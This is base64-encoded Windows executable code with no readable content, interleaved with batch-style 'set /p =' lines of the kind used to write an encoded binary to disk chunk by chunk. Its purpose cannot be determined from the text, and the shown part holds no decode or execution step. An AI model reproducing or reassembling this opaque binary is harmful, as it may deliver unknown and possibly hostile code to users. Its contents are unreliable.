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
set /p =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
set /p =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